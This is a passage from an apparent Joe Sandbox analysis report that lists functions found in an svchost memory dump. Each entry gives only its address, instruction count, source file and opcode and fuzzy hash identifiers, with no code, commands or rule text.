                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                            • Instruction ID: 880e27663e21d8a20c9055a319c5d6904da45485ca8a29adbb4b079c6035c6ac
                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                            • Instruction Fuzzy Hash: 4DD0C935212E80CFDA1ACF0DC5A4B16B3B8BB84B44F8504D6E641CBB61D66CD940CE00
                                            Function 03AB930B Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                            • Instruction ID: 632d3b0d76bb7d08aee6107e8458d0d5c7023bb214be5985c1e856d51f911031
                                            • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                            • Instruction Fuzzy Hash: 43D01735945AC48FE727CB08C165B917BF8F705B40F89009DE04247AA2C37C9984CB10
                                            Function 03A6C700 Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                            • Instruction ID: 0c8f2f15a9ff17853e7808da0b1fe326ad6be17876a823b7d93c5f23639fae69
                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                            • Instruction Fuzzy Hash: A8C01236250644AFC711EA94CD01F0177A9E798B40F004021F2044B670C571E820D644
                                            Function 03A50310 Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                            • Instruction ID: 95bff0504406cec5cc201f72e0cf991c6552edae0daec6b6adc423965ac4311d
                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                            • Instruction Fuzzy Hash: 7ED01236100248EFCB01DF41D990D9A772AFBD8710F149019FD190B7108A31ED62DA50
                                            Function 03A30750 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                            • Instruction ID: 54cf3c959cba6ba43dd42daf1549acb4edaae4b9eb13ace2f51034a607eecbb7
                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                            • Instruction Fuzzy Hash: A5C048B9B01A41CFCF15EB2AD398F4977E8FB84740F1948D1E805CBB21E624E811CA10
                                            Function 03A74340 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 68c526662f9eaac2dc143cb60ac73e07b925d6bfbb7f06ab4b7d19c33b5057f9
                                            • Instruction ID: 4f5b4623c9dff27b171f5295851ec73d05e3a1f9d48205e9d262bdda1c1e9b40
                                            • Opcode Fuzzy Hash: 68c526662f9eaac2dc143cb60ac73e07b925d6bfbb7f06ab4b7d19c33b5057f9
                                            • Instruction Fuzzy Hash: 56900231605804129140B25848C4586800A97E0301B96C012E0424558C8F188A565371
                                            Function 03A73090 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 39a5df7367ab553756e9914722894eb56deb5e3fa822f085525e943d64cddd48
                                            • Instruction ID: 1d54d1d9bd09668607714e1ffd1c9049cf6b1357f8c7e39cd06b43f6e8a6e90e
                                            • Opcode Fuzzy Hash: 39a5df7367ab553756e9914722894eb56deb5e3fa822f085525e943d64cddd48
                                            • Instruction Fuzzy Hash: FA90022124140C02D140B2588454747400BC7D0701F96C012A0024558D8B1A8A6566B1
                                            Function 03A73010 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7ce61163c570eb71effab79aca9290af278e8b1b65eb8bf01d7185b76370a12a
                                            • Instruction ID: a9f046f472ae041aa9ab1269dc12bb4c1ca045a3c2b9b053e93a73cc8fea41fe
                                            • Opcode Fuzzy Hash: 7ce61163c570eb71effab79aca9290af278e8b1b65eb8bf01d7185b76370a12a
                                            • Instruction Fuzzy Hash: CB90022120184842D140B3584844B4F810A87E1302FD6C01AA4156558CCE1989555731
                                            Function 03A74650 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7a53c565c7e2089dbd264bf25a15b57c5dae226d02f09b87817634c432705d30
                                            • Instruction ID: 9b6c94d190057ec0c99f38a1ffbe42ed098602b745881b9a3c029e2c805014b7
                                            • Opcode Fuzzy Hash: 7a53c565c7e2089dbd264bf25a15b57c5dae226d02f09b87817634c432705d30
                                            • Instruction Fuzzy Hash: D5900261601504424140B2584844446A00A97E13013D6C116A0554564C8B1C89559279
                                            Function 03A72BA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d20371795200f7d6214868c544299361f11c4b1892bb3189543ee8c8c91eccf
                                            • Instruction ID: bd5aec11f7a917f59858093a662180b6b57f313dec5733e9e4d6197ace2d1c29
                                            • Opcode Fuzzy Hash: 8d20371795200f7d6214868c544299361f11c4b1892bb3189543ee8c8c91eccf
                                            • Instruction Fuzzy Hash: 8F90023160540C02D150B2584454786400A87D0301F96C012A0024658D8B598B5576B1
                                            Function 03A72B80 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1981b2a18ec334b45b6691ae50d0b5dd9f5ef5ef4770d89bd83fdb9a71b7165a
                                            • Instruction ID: 9f0212bf7eaeeebf89fe636263a96049ff3b913ef59b41b21d89ae7b387dfc7a
                                            • Opcode Fuzzy Hash: 1981b2a18ec334b45b6691ae50d0b5dd9f5ef5ef4770d89bd83fdb9a71b7165a
                                            • Instruction Fuzzy Hash: DC90023120140C02D104B25848446C6400A87D0301F96C012A6024659E9B6989917131
                                            Function 03A72BE0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80cbff06bf80c0e2aa0fb2f0763fea77ec6522d48615e2989a6f35af46e81d6a
                                            • Instruction ID: 99f1909509e894226c65ffe029000fa59f8593dff52a4795a55c379d7f220421
                                            • Opcode Fuzzy Hash: 80cbff06bf80c0e2aa0fb2f0763fea77ec6522d48615e2989a6f35af46e81d6a
                                            • Instruction Fuzzy Hash: F990023120544C42D140B2584444A86401A87D0305F96C012A0064698D9B298E55B671
                                            Function 03A72BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4092c4c0539e6af747af659d731272539888c7c5ab560a979c00cb38991e8eda
                                            • Instruction ID: 2b52c13725e8dd7f0cd6669340a04226487b6a364c2a99490ef91d9da8a08125
                                            • Opcode Fuzzy Hash: 4092c4c0539e6af747af659d731272539888c7c5ab560a979c00cb38991e8eda
                                            • Instruction Fuzzy Hash: 4190023120140C02D180B258444468A400A87D1301FD6C016A0025658DCF198B5977B1
                                            Function 03A72AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52888675d200e506bc2b322d23e9808c2cc9c5044c8c63cb38af478ad7a2b7b7
                                            • Instruction ID: 49060d19ecef0a5904bf1671d538003d4a171ee58bfddd45c12a31b441553543
                                            • Opcode Fuzzy Hash: 52888675d200e506bc2b322d23e9808c2cc9c5044c8c63cb38af478ad7a2b7b7
                                            • Instruction Fuzzy Hash: D79002A1201544924500F3588444B4A850A87E0301B96C017E1054564CCA2989519135
                                            Function 03A72AF0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 47f35ad641ac83e2186a6eb4d232ee54244e75c1077c22e31e6da9ea883eb012
                                            • Instruction ID: a5223688f6abb881e12cf11eaba9a95051dd7c49413644d08c58e0321b2e575e
                                            • Opcode Fuzzy Hash: 47f35ad641ac83e2186a6eb4d232ee54244e75c1077c22e31e6da9ea883eb012
                                            • Instruction Fuzzy Hash: EE900225221404020145F658064454B444A97D63513D6C016F1416594CCB2589655331
                                            Function 03A72AD0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6902ab728e85863d3f4bda96277ad561ed39ac51406dcff81c3992767dc2b68
                                            • Instruction ID: 59f9088fff3487e3ea323a96c53c24ff27f134106eddd6390f43d77e3a418e95
                                            • Opcode Fuzzy Hash: e6902ab728e85863d3f4bda96277ad561ed39ac51406dcff81c3992767dc2b68
                                            • Instruction Fuzzy Hash: 4B900435311404030105F75C0744547404FC7D53513D7C033F1015554CDF35CD715131
                                            Function 03A739B0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cf369254d1442b133412931394f5493e607a14cd8e11e3d0028d41554af0dd56
                                            • Instruction ID: 7e3f6e138cf15bcf951c92bf1d94aae68fc09b48b1a9639f62d079b5cdaa2739
                                            • Opcode Fuzzy Hash: cf369254d1442b133412931394f5493e607a14cd8e11e3d0028d41554af0dd56
                                            • Instruction Fuzzy Hash: BD90022124545502D150B25C4444656800AA7E0301F96C022A0814598D8A5989556231
                                            Function 03A72FA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a7b9f996df2abde099f42cfc5af05c71f0c0d7132c79f02fb958c1306fc47d1c
                                            • Instruction ID: 862c9a2c29e6b4f4d9be7dafc4b8161a4e5858567f33c7d16480529c7f84f6cf
                                            • Opcode Fuzzy Hash: a7b9f996df2abde099f42cfc5af05c71f0c0d7132c79f02fb958c1306fc47d1c
                                            • Instruction Fuzzy Hash: 5290023120180802D100B2584848787400A87D0302F96C012A5164559E8B69C9916531
                                            Function 03A72FB0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1600046cbbb195b19ec7098c4622af91ab2dc97aa8f6916553bdbe82b1702426
                                            • Instruction ID: f395d6521db4a6659c57406cb5216dcf6c434b789d4011497581894ad8c81e27
                                            • Opcode Fuzzy Hash: 1600046cbbb195b19ec7098c4622af91ab2dc97aa8f6916553bdbe82b1702426
                                            • Instruction Fuzzy Hash: E3900221601404424140B2688884946800AABE1311796C122A0998554D8A5D89655675
                                            Function 03A72F90 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8679b508a523df612dbdc91b9e802291fba349013447b279d6aaaedfadb40da0
                                            • Instruction ID: 85e24c5b67aef11bc723c4417f91d54dec2a8bee427fcca3f63a43713e790caa
                                            • Opcode Fuzzy Hash: 8679b508a523df612dbdc91b9e802291fba349013447b279d6aaaedfadb40da0
                                            • Instruction Fuzzy Hash: 9A90023120180802D100B258485474B400A87D0302F96C012A1164559D8B2989516571
                                            Function 03A72FE0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 19ed4ca94fbcb0ce4136e1c08095813115e6bbc47b29a5353b9d79ee7366c560
                                            • Instruction ID: 269aa5b9903bf4c6c8ee247f90942a250528b3b8f4b6f402b25910e3670f4eb2
                                            • Opcode Fuzzy Hash: 19ed4ca94fbcb0ce4136e1c08095813115e6bbc47b29a5353b9d79ee7366c560
                                            • Instruction Fuzzy Hash: F4900221211C0442D200B6684C54B47400A87D0303F96C116A0154558CCE1989615531
                                            Function 03A72F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2e6367d51e3f464020c64b0e0342dd17d4ce4b7d184fa149db916abad78e5668
                                            • Instruction ID: 7e5bb11c719795e81707f8a49892f40e9e9ba9841dca345d0b2f30796632da34
                                            • Opcode Fuzzy Hash: 2e6367d51e3f464020c64b0e0342dd17d4ce4b7d184fa149db916abad78e5668
                                            • Instruction Fuzzy Hash: E990026134140842D100B2584454B46400AC7E1301F96C016E1064558D8B1DCD526136
                                            Function 03A72F60 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b625b05b53d64212807664abcda754801856069ec9c70f1cbae2cc81bde0342
                                            • Instruction ID: d8c1f408ebad77ecb54ddd81f3f78bc7baf83078ee147537737722d54d015f8d
                                            • Opcode Fuzzy Hash: 9b625b05b53d64212807664abcda754801856069ec9c70f1cbae2cc81bde0342
                                            • Instruction Fuzzy Hash: 9390026121140442D104B2584444746404A87E1301F96C013A2154558CCA2D8D615135
                                            Function 03A72EA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8b7fe70b6d7b1db1a1db442cb7230ac382e9fb1f15c8df4b983fd3b836789434
                                            • Instruction ID: e8a50da451d5a3d606a2b96a9272713038d03c5b8b2a4a6807586778a7e61d52
                                            • Opcode Fuzzy Hash: 8b7fe70b6d7b1db1a1db442cb7230ac382e9fb1f15c8df4b983fd3b836789434
                                            • Instruction Fuzzy Hash: 0590027120140802D140B2584444786400A87D0301F96C012A5064558E8B5D8ED56675
                                            Function 03A72E80 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c44e75ba04b98fd6e0901ef61242ad5f84440c998719e80c8d90d03f9934c765
                                            • Instruction ID: e303f57d1a5663c1869d8415abfae552c449150872fe418899db69d36fc75ad6
                                            • Opcode Fuzzy Hash: c44e75ba04b98fd6e0901ef61242ad5f84440c998719e80c8d90d03f9934c765
                                            • Instruction Fuzzy Hash: 8190022160140902D101B2584444656400F87D0341FD6C023A1024559ECF298A92A131
                                            Function 03A72EE0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b9387c15e0f304d47f3eb94e3319f8025b068b97077c8ab15c80d1f38587ebfd
                                            • Instruction ID: 241df3eaa6b3a87db98e35d66bfdd7e7a09ee1ce0026968ea7d9cd5be3f9d148
                                            • Opcode Fuzzy Hash: b9387c15e0f304d47f3eb94e3319f8025b068b97077c8ab15c80d1f38587ebfd
                                            • Instruction Fuzzy Hash: 9590026120180803D140B6584844647400A87D0302F96C012A2064559E8F2D8D516135
                                            Function 03A72E30 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6037c3c08fc68a310cf7559adb636d79ffe3402f9f1345dd05f608bc5426b007
                                            • Instruction ID: 5d635efbf04ea7e90f25870dc8807114b4e00bb39f390a9a5b947059099fe3f3
                                            • Opcode Fuzzy Hash: 6037c3c08fc68a310cf7559adb636d79ffe3402f9f1345dd05f608bc5426b007
                                            • Instruction Fuzzy Hash: 9990022130140802D102B2584454646400EC7D1345FD6C013E1424559D8B298A53A132
                                            Function 03A72DB0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 357e3815be04e383424d7202da5bdd3256bec30c73c0ea87fea3450405d28a36
                                            • Instruction ID: d9e24f8b6617e462a143ba2d99d78a6a6a85e7ba63dd81d1f0a27f8a403b8dd0
                                            • Opcode Fuzzy Hash: 357e3815be04e383424d7202da5bdd3256bec30c73c0ea87fea3450405d28a36
                                            • Instruction Fuzzy Hash: 5990023124140802D141B2584444646400E97D0341FD6C013A0424558E8B598B56AA71
                                            Function 03A72DD0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 76a9db35322fc9f15a5f5e5c38d9b97aa2079b6956dfc159d178729138af2050
                                            • Instruction ID: 3702aab53614c89fc6c766f202ce157726bd2c79021f55c8adddd5991e8c949d
                                            • Opcode Fuzzy Hash: 76a9db35322fc9f15a5f5e5c38d9b97aa2079b6956dfc159d178729138af2050
                                            • Instruction Fuzzy Hash: F8900221242445525545F2584444547800B97E03417D6C013A1414954C8A2A9956D631
                                            Function 03A72D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8db3b0099dde00c0ce7373548a94028dcea12e34a0f0f36300315bf1e096eb20
                                            • Instruction ID: da7d611ebaac140cdcaa956a8a9830bc49e02b782710f09473408fd84780ea82
                                            • Opcode Fuzzy Hash: 8db3b0099dde00c0ce7373548a94028dcea12e34a0f0f36300315bf1e096eb20
                                            • Instruction Fuzzy Hash: A490022130140403D140B2585458646800AD7E1301F96D012E0414558CDE1989565232
                                            Function 03A72D00 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 962df8df9f84fa4dbfcd20879f6945b8480713fe2257470b93e01b3f55978ca6
                                            • Instruction ID: 202c1a662dbb0a8b21df97da26fdbef98c899174412a8f14635dcb71552abba8
                                            • Opcode Fuzzy Hash: 962df8df9f84fa4dbfcd20879f6945b8480713fe2257470b93e01b3f55978ca6
                                            • Instruction Fuzzy Hash: BD90022120544842D100B6585448A46400A87D0305F96D012A1064599DCB398951A131
                                            Function 03A72D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fb5a18b1fbaca51a1bb437f9345af34e51edeb33ed0e96870f1f040ef618d3e8
                                            • Instruction ID: 30d74a254c04f7e8553604c7050cade66c232875b9a70b6c2cc632ce732dcee0
                                            • Opcode Fuzzy Hash: fb5a18b1fbaca51a1bb437f9345af34e51edeb33ed0e96870f1f040ef618d3e8
                                            • Instruction Fuzzy Hash: B090022921340402D180B258544864A400A87D1302FD6D416A001555CCCE1989695331
                                            Function 03A73D10 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d09e79b07f4f0c9f03a70a93e72db37cb9da632792e0a7e4a2cc9686161b0c92
                                            • Instruction ID: 672b4469694b36afb9e820c61ce8931173e1ebe7a4825f9cc632e706461aa190
                                            • Opcode Fuzzy Hash: d09e79b07f4f0c9f03a70a93e72db37cb9da632792e0a7e4a2cc9686161b0c92
                                            • Instruction Fuzzy Hash: B1900231202405429540B3585844A8E810A87E1302BD6D416A0015558CCE1889615231
                                            Function 03A73D70 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0724a55702557b88eab522a681f65254646a936601d49c18b871fd219445dc67
                                            • Instruction ID: 075ed57014af68d780c9e581c0fd3fd5d9054d15b653e7f65f31ac4293f73864
                                            • Opcode Fuzzy Hash: 0724a55702557b88eab522a681f65254646a936601d49c18b871fd219445dc67
                                            • Instruction Fuzzy Hash: 5990023520140802D510B2585844686404B87D0301F96D412A042455CD8B5889A1A131
